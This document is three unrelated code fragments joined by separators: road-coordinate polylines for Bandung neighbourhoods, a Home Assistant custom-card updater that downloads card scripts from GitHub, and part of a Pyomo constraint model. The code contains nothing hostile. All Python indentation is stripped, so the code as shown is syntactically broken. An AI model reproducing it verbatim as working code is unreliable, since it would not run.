[107.5913213,-6.9164962],
[107.5910531,-6.9164962],
[107.5904737,-6.9164536],
[107.5904415,-6.9166986],
[107.5904737,-6.9164536],
[107.590066,-6.9164004],
[107.5899534,-6.9171459],
[107.5898944,-6.9177424],
[107.5898622,-6.9182163],
[107.589889,-6.9177371],
[107.589948,-6.9171353],
[107.5900017,-6.9168477],
[107.5898085,-6.9168477],
[107.5898085,-6.9167359],
[107.589712,-6.9165921],
[107.5897066,-6.9163738],
[107.590066,-6.9164004],
[107.5897066,-6.9163738],
[107.5894223,-6.9163205],
[107.5894062,-6.9164749],
[107.5893794,-6.9166187],
[107.5894545,-6.9166773],
[107.5894598,-6.9167146],
[107.5894116,-6.9167998],
[107.5894759,-6.9168158],
[107.5894545,-6.9169223],
[107.5896261,-6.916885],
[107.5898085,-6.9168477],
]])
self.jalan.record(nama)
self.jalan.line([[
[107.5890883,-6.9137554],
[107.589024,-6.9145329],
[107.5891151,-6.9147299],
[107.5900646,-6.9159441],
[107.5902953,-6.9157844],
[107.5908371,-6.915827],
[107.5902953,-6.9157844],
[107.5904884,-6.9155501],
[107.5903972,-6.9156619],
[107.5899627,-6.91514],
[107.5903972,-6.9156619],
[107.5902953,-6.9157844],
[107.5900646,-6.9159441],
[107.5905314,-6.9164554],
[107.5910531,-6.9164962],
[107.5913213,-6.9164962],
[107.5918456,-6.9164926],
[107.5916793,-6.9158696],
[107.5913467,-6.9155394],
[107.5915238,-6.9153264],
[107.5915881,-6.915124],
[107.5917705,-6.9149057],
[107.5920924,-6.9152039],
[107.5917652,-6.914911],
[107.5913414,-6.9146021],
[107.5906923,-6.9142666],
[107.590923,-6.914224],
[107.5916203,-6.9142453],
[107.5909283,-6.9142187],
[107.5906869,-6.914272],
[107.5905367,-6.9142933],
[107.5904026,-6.9146075],
[107.5904455,-6.9145169],
[107.5911965,-6.9149589],
[107.5910249,-6.9152838],
[107.5913414,-6.9155501],
[107.5910356,-6.9152891],
[107.5905099,-6.914895],
[107.590585,-6.9149589],
[107.5907459,-6.9147033],
[107.5904509,-6.9145169],
[107.5901183,-6.9143465],
[107.5894048,-6.9140909],
[107.5890669,-6.9139844],
[107.589024,-6.9145436],
[107.5885358,-6.9141388],
[107.5880315,-6.9145649],
[107.5880047,-6.914927],
[107.5886163,-6.9150761],
[107.5891205,-6.9147299],
[107.5886216,-6.9150708],
[107.5881335,-6.9154702],
[107.5884178,-6.916237],
[107.5894223,-6.9163205],
[107.5890642,-6.9162929],
[107.5890964,-6.9164634],
[107.5890695,-6.9166178],
[107.5890481,-6.9168255],
[107.5890374,-6.9168628],
[107.5886833,-6.9169586],
]])
self.jalan.record(nama)
self.jalan.line([[
[107.5884622,-6.9172347],
[107.5884771,-6.9170196],
[107.5883752,-6.916945],
[107.5883591,-6.9167347],
[107.5883645,-6.9162341],
[107.5884178,-6.916237],
[107.5883672,-6.9162288],
[107.5879675,-6.9161729],
[107.5879756,-6.916314],
[107.5879407,-6.9166016],
[107.5879622,-6.9168359],
[107.5879434,-6.9166016],
[107.5879783,-6.9163113],
[107.5879648,-6.9161702],
[107.5876081,-6.9161409],
[107.5876403,-6.916543],
[107.587702,-6.9168332],
[107.5877127,-6.9170169],
[107.5878415,-6.9170382],
[107.5878239,-6.9171415],
[107.5878361,-6.9170382],
[107.5877047,-6.9170089],
[107.5877047,-6.9168279],
[107.5876376,-6.916535],
[107.5876081,-6.9161382],
[107.5875732,-6.9161329],
[107.5875893,-6.9158533],
[107.5883001,-6.9159252],
[107.5878924,-6.9158853],
[107.58793,-6.9157388],
[107.5881335,-6.9154702],
[107.58793,-6.9157335],
[107.5878897,-6.915888],
[107.5875866,-6.915856],
[107.587769,-6.9154752],
[107.5880399,-6.9149427],
[107.5880047,-6.914927],
[107.5880315,-6.9145649],
[107.586959,-6.9154167],
[107.5869912,-6.9154353],
[107.5869885,-6.9154726],
[107.5870127,-6.9155152],
[107.5869697,-6.9158693],
[107.5869697,-6.9160797],
[107.5875786,-6.9161356],
[107.5869697,-6.916077],
[107.5867739,-6.9160664],
[107.5867364,-6.91633],
[107.5867364,-6.916559],
[107.5866908,-6.9166415],
[107.5867203,-6.9168572],
[107.5867471,-6.9170888],
[107.5867617,-6.9171441],
[107.5867444,-6.9170888],
[107.5867176,-6.9168519],
[107.5863153,-6.9168998],
[107.5862643,-6.9167879],
[107.5863153,-6.9169078],
[107.5863421,-6.9169956],
[107.5859881,-6.9169983],
[107.5853631,-6.9169424],
[107.58517,-6.9168998],
[107.5853631,-6.9169424],
[107.5853792,-6.9166974],
[107.5855213,-6.9167081],
[107.5853846,-6.9166974],
[107.5851861,-6.9167001],
[107.5853792,-6.9166974],
[107.5853872,-6.916543],
[107.5857359,-6.9165989],
[107.5853872,-6.9165377],
[107.5851941,-6.916527],
[107.5853899,-6.916543],
[107.5854087,-6.9163859],
[107.5851995,-6.9163513],
[107.5854141,-6.9163832],
[107.5854275,-6.9162208],
[107.5855991,-6.9158294],
[107.5852236,-6.9157149],
[107.5856018,-6.9158294],
[107.5861222,-6.9159865],
[107.586149,-6.9163273],
[107.5862268,-6.916322],
[107.5862965,-6.9163646],
[107.5864521,-6.9163486],
[107.5865674,-6.9163752],
[107.5867418,-6.916338],
[107.5865647,-6.9163779],
[107.5864494,-6.9163486],
[107.5862938,-6.9163646],
[107.5862187,-6.916322],
[107.5861436,-6.9163246],
[107.5861302,-6.9164737],
[107.5859344,-6.9164498],
[107.5857735,-6.9164072],
[107.5854087,-6.9163859],
[107.5854302,-6.9162155],
[107.5856233,-6.9162794],
]])
self.jalan.record(nama)
self.jalan.line([[
[107.5834349,-6.9110762],
[107.5836306,-6.9112092],
[107.5834267,-6.9116352],
[107.583239,-6.9115606],
[107.5834267,-6.9116352],
[107.5836306,-6.9112092],
[107.5838023,-6.9113423],
[107.583636,-6.9116299],
[107.5838023,-6.9113423],
[107.5844621,-6.9118109],
[107.5844192,-6.9119707],
[107.584505,-6.9122316],
[107.5845694,-6.9123754],
[107.5845425,-6.9126044],
[107.5840544,-6.9125512],
[107.5839471,-6.9128334],
[107.5845479,-6.9128387],
[107.5839471,-6.9128334],
[107.5837969,-6.9131689],
[107.5847035,-6.9132062],
[107.5837969,-6.9131689],
[107.5836441,-6.9139414],
]])
self.jalan.record(nama)
self.jalan.line([[
[107.5830862,-6.9138388],
[107.5831746,-6.913342],
]])
self.jalan.record(nama)
self.jalan.line([[
[107.5853103,-6.9154833],
[107.5856881,-6.9154143],
[107.5855915,-6.91514],
[107.5856881,-6.9154143],
[107.5856881,-6.9155794],
[107.5856291,-6.9158377],
[107.5857927,-6.9158829],
[107.5859697,-6.9153903],
[107.5856881,-6.9154143],
[107.5859697,-6.9153903],
[107.5859992,-6.9152945],
[107.586077,-6.9152732],
[107.5866376,-6.9153664],
[107.586959,-6.9154167],
[107.5866376,-6.9153664],
[107.5868307,-6.9147646],
[107.5871445,-6.913798],
[107.5879277,-6.9140909],
[107.5883381,-6.9142986],
[107.5885358,-6.9141388],
[107.5882496,-6.9139285],
[107.5878311,-6.9137395],
[107.5876434,-6.9136915],
[107.5872169,-6.9135105],
[107.5871445,-6.913798],
[107.5872169,-6.9135105],
[107.5868736,-6.9133587],
[107.5867851,-6.9136543],
[107.5868092,-6.9137315],
[107.5866376,-6.9145409],
]])
self.jalan.record(nama)
self.jalan.line([[
[107.5867739,-6.9160664],
[107.5861222,-6.9159865],
[107.5861651,-6.9159929],
[107.5861503,-6.9157705],
[107.5861288,-6.9152753],
]])
self.jalan.record(nama)
self.jalan.line([[
[107.5857367,-6.9126875],
[107.5863523,-6.9130875],
[107.5867492,-6.9133005],
[107.5868736,-6.9133587],
[107.5867546,-6.9133005],
[107.5866473,-6.9135562],
[107.5867546,-6.9132952],
[107.5863523,-6.9130822],
[107.5861162,-6.9132846],
[107.5861377,-6.9135189],
[107.5860411,-6.9135402],
[107.5859285,-6.9148236],
[107.5857783,-6.9148449],
[107.585789,-6.9149887],
]])
def jalanKelurahanDungusCariang(self, nama):
self.jalan.record(nama)
self.jalan.line([[
[107.5767156,-6.9174426],
[107.5770075,-6.9174589],
[107.5770182,-6.9173577],
[107.5770075,-6.9174589],
[107.5780053,-6.917576],
[107.5781233,-6.9171447],
[107.5780053,-6.917576],
[107.5781286,-6.9175973],
[107.5787509,-6.9176825],
[107.5788689,-6.9176879],
[107.5789923,-6.9177305],
[107.580607,-6.9179169],
[107.5812024,-6.9180074],
[107.5820017,-6.9180926],
[107.5820178,-6.9178796],
[107.5820822,-6.9177092],
[107.5820178,-6.9178796],
[107.5820017,-6.9180926],
[107.5826938,-6.9181831],
[107.5830907,-6.9182417],
[107.5843996,-6.9183802],
[107.5850876,-6.9184706],
[107.5849951,-6.9184494],
[107.5850648,-6.9176399],
[107.5851589,-6.9176585],
[107.5850648,-6.9176399],
[107.5850809,-6.9172938],
[107.5844104,-6.9173257],
[107.5839222,-6.9172885],
[107.5844104,-6.9173257],
[107.5844265,-6.9170808],
[107.5844104,-6.9173257],
[107.5843996,-6.9183802],
]])
self.jalan.record(nama)
self.jalan.line([[
[107.5850809,-6.9172938],
[107.5851171,-6.9168794],
[107.58517,-6.9168998],
[107.5851171,-6.9168794],
[107.5851117,-6.9166984],
[107.5851861,-6.9167001],
[107.5851117,-6.9166984],
[107.5851225,-6.9165173],
[107.5851941,-6.916527],
[107.5851225,-6.9165173],
[107.5851332,-6.9163362],
[107.5851995,-6.9163513],
[107.5851332,-6.9163362],
[107.5851868,-6.9157025],
[107.5852236,-6.9157149],
[107.5843232,-6.9154256],
[107.5842749,-6.9155747],
[107.5842856,-6.9157025],
[107.5842749,-6.9155747],
[107.5843232,-6.9154256],
[107.5838725,-6.9152552],
[107.5838243,-6.9156812],
[107.5838296,-6.915596],
[107.5836687,-6.9155747],
[107.5836633,-6.9154416],
[107.5836204,-6.915399],
[107.5836687,-6.9151966],
[107.5838725,-6.9152552],
[107.5836687,-6.9151966],
[107.5835399,-6.9151806],
[107.583497,-6.915367],
[107.5834058,-6.915383],
[107.5833576,-6.9156013],
[107.5834058,-6.915383],
[107.583497,-6.915367],
[107.5835399,-6.9151806],
[107.5832878,-6.9150741],
[107.5834756,-6.9144138],
[107.5835882,-6.9139931],
[107.5836366,-6.9139975],
[107.5835882,-6.9139931],
[107.5830303,-6.9138653],
[107.5824724,-6.9137268],
[107.5824724,-6.9136576],
[107.5825368,-6.91337],
[107.5826173,-6.9131463],
[107.5827138,-6.9127842],
[107.5828587,-6.9123102],
[107.5830089,-6.9118842],
[107.5831913,-6.9115221],
[107.583239,-6.9115606],
[107.5831913,-6.9115221],
[107.5833844,-6.9110481],
[107.5834349,-6.9110762],
[107.5833844,-6.9110481],
[107.5826226,-6.9105635],
[107.5824402,-6.9109043],
[107.5826226,-6.9105635],
[107.5821613,-6.9102386],
[107.5821291,-6.9103398],
[107.5821184,-6.910654],
[107.5819789,-6.9108883],
[107.5819789,-6.9110747],
[107.5819789,-6.9108883],
[107.5821184,-6.910654],
[107.5821291,-6.9103398],
[107.5821613,-6.9102386],
[107.581657,-6.9099351],
[107.5815229,-6.9098446],
[107.5813566,-6.9101801],
[107.581244,-6.9105315],
[107.5813674,-6.9105688],
[107.581244,-6.9105315],
[107.5813566,-6.9101801],
[107.5815229,-6.9098446],
[107.5813888,-6.9096901],
[107.5811528,-6.9100097],
[107.5809811,-6.9103185],
[107.5810348,-6.9104037],
[107.5810026,-6.9104676],
[107.5806217,-6.9102173],
[107.5810079,-6.9096262],
[107.5810723,-6.9096262],
[107.5811313,-6.909525],
[107.5813888,-6.9096901],
[107.5811313,-6.909525],
[107.5807236,-6.9092907],
[107.5804983,-6.9091096],
[107.5801443,-6.9088807],
[107.5798814,-6.9087369],
[107.5790499,-6.9081351],
[107.5798814,-6.9087369],
[107.5798653,-6.9088487],
[107.5797419,-6.9088221],
[107.579581,-6.9087102],
[107.5793289,-6.9085451],
[107.5791519,-6.9084493],
[107.578889,-6.908428],
[107.5788085,-6.908412],
]])
self.jalan.record(nama)
self.jalan.line([[
[107.5788757,-6.9112659],
[107.5781462,-6.9110636],
]])
self.jalan.record(nama)
self.jalan.line([[
[107.5782803,-6.9117612],
[107.5780013,-6.9117026],
]])
self.jalan.record(nama)
self.jalan.line([[
[107.576847,-6.9168861],
[107.5773318,-6.9169331],
[107.5774338,-6.9168479],
[107.5775947,-6.9164166],
[107.5776752,-6.9162408],
[107.5777663,-6.9157562],
[107.57782,-6.9154633],
[107.5772031,-6.9153408],
[107.57782,-6.9154633],
[107.5778736,-6.9154101],
[107.5782062,-6.915458],
[107.5785549,-6.9156124],
[107.5784798,-6.9159053],
[107.5781633,-6.9158468],
[107.5780507,-6.9158042],
[107.5777663,-6.9157562],
[107.5780507,-6.9158042],
[107.5781687,-6.9158468],
[107.5784798,-6.9159053],
[107.5784369,-6.9160544],
[107.5782277,-6.9160065],
[107.5784369,-6.9160544],
[107.578394,-6.9163154],
[107.5790324,-6.9164805],
[107.5791128,-6.9164059],
[107.5791718,-6.9162621],
[107.5791128,-6.9164059],
[107.5790324,-6.9164805],
[107.578394,-6.9163154],
[107.5782491,-6.9169065],
[107.5781286,-6.9175973],
[107.5787509,-6.9176825],
[107.5788689,-6.9176879],
[107.5789465,-6.9173006],
[107.5789519,-6.9170556],
[107.5782491,-6.9169065],
[107.5789519,-6.9170556],
[107.5789465,-6.9173006],
[107.5790377,-6.9171941],
[107.5793274,-6.9163527],
[107.5796546,-6.9164539],
[107.5796707,-6.9165391],
[107.5798907,-6.9166083],
[107.5799336,-6.9165178],
[107.5801213,-6.9165444],
[107.5806578,-6.9167254],
[107.5807597,-6.9165444],
]])
self.jalan.record(nama)
self.jalan.line([[
[107.5775873,-6.9136243],
[107.5787955,-6.9139343],
[107.5786346,-6.9142752],
[107.5784951,-6.914813],
[107.5779962,-6.9147385],
[107.5778736,-6.9154101],
[107.5782062,-6.915458],
[107.5784951,-6.914813],
[107.5784522,-6.9149089],
[107.5786453,-6.9149834],
[107.5785702,-6.9153136],
[107.5785112,-6.9155905],
[107.5785549,-6.9156124],
[107.5791362,-6.9156811],
[107.5793561,-6.9157317],
[107.579289,-6.9159607],
[107.5793561,-6.9157317],
[107.5795412,-6.915753],
[107.5793274,-6.9163527],
[107.5794634,-6.9159793],
[107.5802734,-6.9162056],
[107.5802224,-6.9163654],
[107.5801313,-6.9164133],
[107.5800991,-6.9165464],
[107.5801313,-6.9164133],
[107.5802224,-6.9163654],
[107.5802734,-6.9162056],
[107.580724,-6.9163521],
[107.5807616,-6.9160938],
[107.5808179,-6.9158435],
[107.5803941,-6.9157184],
[107.5803244,-6.9159394],
[107.5807616,-6.9160938],
[107.5803244,-6.9159394],
[107.5795412,-6.915753],
[107.579686,-6.9151405],
[107.5793936,-6.915058],
[107.5793695,-6.9151166],
[107.5791013,-6.9150553],
[107.5790423,-6.9152311],
[107.5791013,-6.9150553],
[107.5793695,-6.9151166],
[107.5792971,-6.9153722],
[107.5792408,-6.9154161],
[107.5791388,-6.9156811],
[107.5792408,-6.9154161],
[107.5785729,-6.915311],
]])
self.jalan.record(nama)
self.jalan.line([[
[107.5805838,-6.9179197],
[107.5806643,-6.917696],
[107.5807501,-6.917704],
[107.5808225,-6.9175176],
[107.5808252,-6.9174084],
[107.5808494,-6.9173445],
[107.5807635,-6.9173099],
[107.5810344,-6.9166682],
[107.5808157,-6.9164871],
[107.580821,-6.9163966],
[107.580724,-6.9163521],
[107.580821,-6.9163966],
[107.5810249,-6.9160664],
[107.5814219,-6.9162155],
[107.5812234,-6.9166469],
[107.5811697,-6.9167427],
[107.5810344,-6.9166682],
[107.5811697,-6.9167427],
[107.5812234,-6.9166469],
[107.5817705,-6.9169078],
[107.5818564,-6.9169078],
[107.5819958,-6.9169558],
[107.5820441,-6.9168386],
[107.5819958,-6.9169558],
[107.5822426,-6.9170303],
[107.5821729,-6.9172593],
[107.5822426,-6.9170303],
[107.5825055,-6.9171102],
[107.5828166,-6.9171475],
[107.5827361,-6.9177066],
[107.5826938,-6.9181831],
[107.5830907,-6.9182417],
[107.5831224,-6.9178877],
[107.5829829,-6.9178717],
[107.5829346,-6.9177705],
[107.5830634,-6.9168812],
[107.5831331,-6.9168066],
[107.5834496,-6.9168546],
[107.5837768,-6.9168919],
[107.5838144,-6.9169717],
[107.5837071,-6.9180634],
[107.5833745,-6.9180315],
[107.5833289,-6.9179503],
[107.5833316,-6.9179023],
[107.5831224,-6.9178877],
[107.5833316,-6.9179023],
[107.583455,-6.9168546],
]])
self.jalan.record(nama)
self.jalan.line([[
[107.5851107,-6.9168255],
[107.5844186,-6.9166924],
[107.5836247,-6.9165273],
[107.5833779,-6.9164634],
[107.5827449,-6.9164101],
[107.5827289,-6.9165273],
[107.582863,-6.9166125],
[107.5833833,-6.9166125],
[107.5835872,-6.9166604],
[107.5836247,-6.9165273],
[107.5844186,-6.9166924],
[107.5844669,-6.9163302],
[107.5846171,-6.9161012],
[107.5844669,-6.9163302],
[107.5837159,-6.9161598],
[107.5836408,-6.9161066],
[107.5834316,-6.9160746],
[107.5835764,-6.9154249],
[107.5836204,-6.915399],
[107.5835764,-6.9154249],
[107.5834316,-6.9160746],
[107.5833779,-6.9164634],
[107.5834316,-6.9160746],
[107.5830078,-6.9160001],
[107.5829059,-6.9160001],
[107.582525,-6.9158882],
[107.5824499,-6.9163462],
[107.5825481,-6.916367],
[107.5824499,-6.9163462],
[107.5822426,-6.9170303],
[107.5824499,-6.9163462],
[107.5819054,-6.9162051],
[107.5820422,-6.9157311],
[107.5820207,-6.9156992],
[107.5817042,-6.9156459],
[107.5816882,-6.915606],
[107.5816935,-6.9155421],
[107.5816399,-6.9154888],
[107.5816506,-6.9154356],
[107.5816962,-6.9152811],
[107.5816372,-6.9152172],
[107.5817203,-6.9147885],
[107.5820181,-6.914887],
[107.5820663,-6.9148657],
[107.5822541,-6.9149084],
[107.582187,-6.9152944],
[107.5822541,-6.9149084],
[107.5822863,-6.9147726],
[107.5825277,-6.9148444],
[107.5824901,-6.9150681],
[107.5825277,-6.9148444],
[107.5825786,-6.9148365],
[107.5825974,-6.9146075],
[107.5825786,-6.9148365],
[107.5830588,-6.9150015],
[107.583107,-6.9150042],
[107.5832116,-6.914674],
[107.583107,-6.9150042],
[107.5832878,-6.9150741],
[107.583107,-6.9150042],
[107.5830185,-6.9151187],
[107.58293,-6.9154888],
| |
"""Logic to handle custom_cards."""
import json
import os
from typing import IO, Any
import requests
from requests import RequestException
import yaml
from pyupdate.ha_custom import common
from pyupdate.log import Logger
class Loader(yaml.SafeLoader):
"""YAML Loader with `!include` constructor."""
def __init__(self, stream: IO) -> None:
"""Initialise Loader."""
try:
self._root = os.path.split(stream.name)[0]
except AttributeError:
self._root = os.path.curdir
super().__init__(stream)
def construct_include(loader: Loader, node: yaml.Node) -> Any:
"""Include file referenced at node."""
filename = os.path.abspath(
os.path.join(loader._root, loader.construct_scalar(node)))
extension = os.path.splitext(filename)[1].lstrip('.')
with open(filename, 'r', encoding='utf-8', errors='ignore') as localfile:
if extension in ('yaml', 'yml'):
return yaml.load(localfile, Loader)
elif extension in ('json', ):
return json.load(localfile)
else:
return ''.join(localfile.readlines())
yaml.add_constructor('!include', construct_include, Loader)
class CustomCards():
"""Custom_cards class."""
def __init__(self, base_dir, mode, skip, custom_repos):
"""Init."""
self.base_dir = base_dir
self.mode = mode
self.skip = skip
self.log = Logger(self.__class__.__name__)
self.local_cards = []
self.super_custom_url = []
self.custom_repos = custom_repos
self.remote_info = None
self.resources = None
async def get_info_all_cards(self, force=False):
"""Return all remote info if any."""
await self.log.debug('get_info_all_cards', 'Started')
if not force and self.remote_info is not None:
await self.log.debug('get_info_all_cards', 'Using stored data')
return self.remote_info
remote_info = {}
allcustom = []
for url in self.custom_repos:
allcustom.append(url)
for url in self.super_custom_url:
allcustom.append(url)
repos = await common.get_repo_data('card', allcustom)
for url in repos:
try:
response = requests.get(url)
if response.status_code == 200:
for name, card in response.json().items():
try:
if name in remote_info:
entry = remote_info.get(name, {})
else:
entry = {}
for attr in card:
entry['name'] = name
entry[attr] = card[attr]
remote_info[name] = entry
except KeyError:
print('Could not get remote info for ' + name)
except RequestException:
print('Could not get remote info for ' + url)
self.remote_info = remote_info
stats = {'count': len(remote_info), 'cards': remote_info.keys()}
await self.log.debug(
'get_info_all_cards', 'Updated stored data ' + str(stats))
return remote_info
async def init_local_data(self):
"""Init new version file."""
await self.log.debug('init_local_data', 'Started')
if not self.local_cards:
await self.localcards()
remote = await self.get_info_all_cards()
await self.super_custom()
for card in remote:
version, path = None, None
if card in self.local_cards:
current = await self.local_data(card, 'get')
if 'version' not in current.keys():
await self.log.debug(
'init_local_data',
'Setting initial version for {}'.format(card))
version = ""
await self.log.debug(
'init_local_data', 'Setting path for {}'.format(card))
path = await self.get_card_dir(card, True)
await self.local_data(
name=card, action='set', version=version, localdir=path)
async def get_sensor_data(self):
"""Get sensor data."""
await self.log.debug('get_sensor_data', 'Started')
if not self.local_cards:
await self.localcards()
cards = await self.get_info_all_cards()
await self.log.debug(
'get_sensor_data', 'Number of cards: ' + str(len(cards.keys())))
await self.log.debug(
'get_sensor_data', 'Cards: ' + str(cards.keys()))
cahce_data = {}
cahce_data['domain'] = 'custom_cards'
cahce_data['has_update'] = []
count_updateable = 0
if cards:
for card in cards:
if card not in self.local_cards:
continue
remote_version = cards[card]['version']
local_version = await self.get_local_version(
cards[card]['name'])
has_update = (
remote_version and remote_version != local_version)
carddir = await self.get_card_dir(cards[card]['name'])
not_local = True if carddir is None else False
if (not not_local and remote_version):
if has_update and not not_local:
count_updateable = count_updateable + 1
cahce_data['has_update'].append(cards[card]['name'])
cahce_data[cards[card]['name']] = {
"local": local_version,
"remote": remote_version,
"has_update": has_update,
"not_local": not_local,
"repo": cards[card]['visit_repo'],
"change_log": cards[card]['changelog'],
}
await self.log.debug(
'get_sensor_data',
'get_sensor_data: [{}, {}]'.format(cahce_data, count_updateable))
return [cahce_data, count_updateable]
async def update_all(self):
"""Update all cards."""
await self.log.debug('update_all', 'Started')
updates = await self.get_sensor_data()
updates = updates[0]['has_update']
if updates is not None:
await self.log.info('update_all', updates)
for name in updates:
await self.upgrade_single(name)
await self.get_info_all_cards(force=True)
else:
await self.log.info('update_all', 'No updates avaiable')
async def force_reload(self):
"""Force data refresh."""
await self.log.debug('force_reload', 'Started')
if self.mode == 'storage':
self.resources = await self.storage_resources()
else:
self.resources = await self.yaml_resources()
await self.localcards()
await self.get_info_all_cards(True)
await self.super_custom()
await self.get_sensor_data()
async def upgrade_single(self, name):
"""Update one card."""
await self.log.info('upgrade_single', 'Started')
remote_info = await self.get_info_all_cards()
remote_info = remote_info[name]
remote_file = remote_info['remote_location']
local_file = await self.get_card_dir(name) + name + '.js'
await common.download_file(local_file, remote_file)
await self.upgrade_lib(name)
await self.upgrade_editor(name)
await self.update_resource_version(name)
await self.log.info('upgrade_single', 'Finished ' + name)
async def upgrade_lib(self, name):
"""Update one card-lib."""
await self.log.debug('upgrade_lib', 'Started')
remote_info = await self.get_info_all_cards()
remote_info = remote_info[name]
remote_file = remote_info['remote_location'][:-3] + '.lib.js'
local_file = await self.get_card_dir(name) + name + '.lib.js'
await common.download_file(local_file, remote_file)
async def upgrade_editor(self, name):
"""Update one card-editor."""
await self.log.debug('upgrade_editor', 'Started')
remote_info = await self.get_info_all_cards()
remote_info = remote_info[name]
remote_file = remote_info['remote_location'][:-3] + '-editor.js'
local_file = await self.get_card_dir(name) + name + '-editor.js'
await common.download_file(local_file, remote_file)
async def install(self, name):
"""Install single card."""
await self.log.debug('install', 'Started')
sdata = await self.get_sensor_data()
if name in sdata[0]:
await self.upgrade_single(name)
async def update_resource_version(self, name):
"""Update the ui-lovelace file."""
await self.log.debug('update_resource_version', 'Started')
remote_version = await self.get_info_all_cards()
remote_version = remote_version[name]['version']
await self.local_data(name, 'set', version=str(remote_version))
async def get_card_dir(self, name, force=False):
"""Get card dir."""
await self.log.debug('get_card_dir', 'Started')
card_dir = None
stored_dir = await self.local_data(name)
stored_dir = stored_dir.get('dir', None)
if stored_dir is not None and not force:
await self.log.debug(
'get_card_dir', 'Using stored data for {}'.format(name))
return stored_dir
if self.resources is None:
if self.mode == 'storage':
self.resources = await self.storage_resources()
else:
self.resources = await self.yaml_resources()
for entry in self.resources:
if entry['url'][:4] == 'http':
continue
entry_name = entry['url'].split('/')[-1].split('.js')[0]
if name == entry_name:
card_dir = entry['url']
break
if card_dir is None:
return None
if '/customcards/' in card_dir:
card_dir = card_dir.replace('/customcards/', '/www/')
if '/local/' in card_dir:
card_dir = card_dir.replace('/local/', '/www/')
stored_dir = "{}{}".format(
self.base_dir, card_dir).split(name + '.js')[0]
await self.local_data(name, action='set', localdir=stored_dir)
await self.log.debug('get_card_dir', stored_dir)
return stored_dir
async def get_local_version(self, name):
"""Return the local version if any."""
await self.log.debug('get_local_version', 'Started')
version = await self.local_data(name)
version = version.get('version')
await self.log.debug('get_local_version', version)
return version
async def get_remote_version(self, name):
"""Return the remote version if any."""
await self.log.debug('get_remote_version', 'Started')
version = await self.get_info_all_cards()
version = version.get(name, {}).get('version')
await self.log.debug('get_remote_version', version)
return version
async def local_data(
self, name=None, action='get', version=None, localdir=None):
"""Write or get info from storage."""
await self.log.debug('local_data', 'Started')
data = {'action': action,
'name': name,
'version': version,
'dir': localdir}
await self.log.debug('local_data', data)
returnvalue = None
jsonfile = "{}/.storage/custom_updater.cards".format(self.base_dir)
if os.path.isfile(jsonfile):
with open(jsonfile, encoding='utf-8',
errors='ignore') as storagefile:
try:
load = json.load(storagefile)
except Exception as error: # pylint: disable=W0703
load = {}
await self.log.error('local_data', error)
else:
load = {}
if action == 'get':
if name is None:
returnvalue = load
else:
returnvalue = load.get(name, {})
else:
card = load.get(name, {})
if version is not None:
card['version'] = version
if localdir is not None:
card['dir'] = localdir
load[name] = card
with open(jsonfile, 'w', encoding='utf-8',
errors='ignore') as outfile:
json.dump(load, outfile, indent=4)
outfile.close()
await self.log.debug('local_data', returnvalue)
return returnvalue
async def storage_resources(self):
"""Load resources from storage."""
await self.log.debug('storage_resources', 'Started')
resources = {}
jsonfile = "{}/.storage/lovelace".format(self.base_dir)
if os.path.isfile(jsonfile):
with open(jsonfile, encoding='utf-8',
errors='ignore') as localfile:
load = json.load(localfile)
resources = load['data']['config'].get('resources', {})
localfile.close()
else:
await self.log.error(
'storage_resources',
'Lovelace config in .storage file not found')
await self.log.debug('storage_resources', resources)
return resources
async def yaml_resources(self):
"""Load resources from yaml."""
await self.log.debug('yaml_resources', 'Started')
resources = {}
yamlfile = "{}/ui-lovelace.yaml".format(self.base_dir)
if os.path.isfile(yamlfile):
with open(yamlfile, encoding='utf-8',
errors='ignore') as localfile:
load = yaml.load(localfile, Loader)
resources = load.get('resources', {})
localfile.close()
else:
await self.log.error(
'yaml_resources', 'Lovelace config in yaml file not found')
await self.log.debug('yaml_resources', resources)
return resources
async def localcards(self):
"""Return local cards."""
await self.log.debug('localcards', 'Started')
await self.log.debug(
'localcards', 'Getting local cards with mode: ' + self.mode)
if not self.remote_info:
await self.get_info_all_cards()
local_cards = []
super_custom_url = []
if self.resources is None:
if self.mode == 'storage':
self.resources = await self.storage_resources()
else:
self.resources = await self.yaml_resources()
for entry in self.resources:
url = entry['url']
if '?track=false' in url or '?track=False' in url:
continue
if url[:4] == 'http':
continue
if '/customcards/github' in url and (
'?track=true' in url or '?track=True' in url):
remote_exist = False
base = "https://raw.githubusercontent.com/"
clean = url.split('/customcards/github/')[1].split('.js')[0]
dev = clean.split('/')[0]
card = clean.split('/')[1]
base = base + "{}/{}/master/".format(dev, card)
if card in self.remote_info:
remote_exist = True
elif await common.check_remote_access(
base + 'custom_card.json'):
remote_exist = True
base = base + 'custom_card.json'
elif await common.check_remote_access(base + 'tracker.json'):
remote_exist = True
base = base + 'tracker.json'
elif await common.check_remote_access(base + 'updater.json'):
remote_exist = True
base = base + 'updater.json'
elif await common.check_remote_access(
base + 'custom_updater.json'):
remote_exist = True
base = base + 'custom_updater.json'
if remote_exist:
super_custom_url.append(base)
card_dir = self.base_dir + "/www/github/" + dev
os.makedirs(card_dir, exist_ok=True)
local_cards.append(url.split('/')[-1].split('.js')[0])
self.super_custom_url = super_custom_url
self.local_cards = local_cards
await self.log.debug('localcards', self.local_cards)
await self.log.debug('localcards', self.super_custom_url)
async def super_custom(self):
"""Super custom stuff."""
for url in self.super_custom_url:
try:
if url.split('/master/')[0].split('/')[1] in self.remote_info:
card_dir = url.split('.com/')[1].split('/master')[0]
else:
response = requests.get(url)
if response.status_code | |
+ m.b405 <= 0)
m.c367 = Constraint(expr= - m.b58 + m.b406 <= 0)
m.c368 = Constraint(expr= - m.b58 + m.b407 <= 0)
m.c369 = Constraint(expr= - m.b58 + m.b408 <= 0)
m.c370 = Constraint(expr= - m.b58 + m.b409 <= 0)
m.c371 = Constraint(expr= - m.b58 + m.b410 <= 0)
m.c372 = Constraint(expr= - m.b58 + m.b411 <= 0)
m.c373 = Constraint(expr= - m.b58 + m.b412 <= 0)
m.c374 = Constraint(expr= - m.b58 + m.b413 <= 0)
m.c375 = Constraint(expr= - m.b58 + m.b414 <= 0)
m.c376 = Constraint(expr= - m.b58 + m.b415 <= 0)
m.c377 = Constraint(expr= - m.b58 + m.b416 <= 0)
m.c378 = Constraint(expr= - m.b58 + m.b417 <= 0)
m.c379 = Constraint(expr= - m.b58 + m.b418 <= 0)
m.c380 = Constraint(expr= - m.b58 + m.b419 <= 0)
m.c381 = Constraint(expr= - m.b58 + m.b420 <= 0)
m.c382 = Constraint(expr= - m.b59 + m.b421 <= 0)
m.c383 = Constraint(expr= - m.b59 + m.b422 <= 0)
m.c384 = Constraint(expr= - m.b59 + m.b423 <= 0)
